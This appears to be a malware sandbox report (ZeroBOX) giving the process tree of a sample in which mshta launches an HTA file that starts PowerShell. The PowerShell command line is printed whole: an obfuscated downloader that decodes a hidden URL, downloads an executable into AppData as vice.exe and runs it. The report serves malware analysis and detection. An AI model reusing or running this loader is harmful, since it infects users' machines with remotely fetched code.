| ZeroBOX

Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\newvice.hta

    292
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LgYBoZgyc($mb, $Q){[IO.File]::WriteAllBytes($mb, $Q)};function qVlmS($mb){if($mb.EndsWith((GGwIXH @(38387,38441,38449,38449))) -eq $True){Start-Process (GGwIXH @(38455,38458,38451,38441,38449,38449,38392,38391,38387,38442,38461,38442)) $mb}else{Start-Process $mb}};function QQMOHWU($go){$Bd = New-Object (GGwIXH @(38419,38442,38457,38387,38428,38442,38439,38408,38449,38446,38442,38451,38457));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $Bd.DownloadData($go);return $Q};function GGwIXH($BQ){$Ei=38341;$Y=$Null;foreach($rf in $BQ){$Y+=[char]($rf-$Ei)};return $Y};function PENpW(){$uqRySCIsZ = $env:APPDATA + '\';$FPTcCxEw = QQMOHWU (GGwIXH @(38445,38457,38457,38453,38456,38399,38388,38388,38451,38442,38460,38448,38390,38387,38456,38445,38452,38453,38388,38426,38426,38446,38456,38443,38448,38421,38414,38388,38459,38446,38440,38442,38387,38442,38461,38442));$LdgHFwF = $uqRySCIsZ + 'vice.exe';LgYBoZgyc $LdgHFwF $FPTcCxEw;qVlmS $LdgHFwF;;;;}PENpW;

      2232
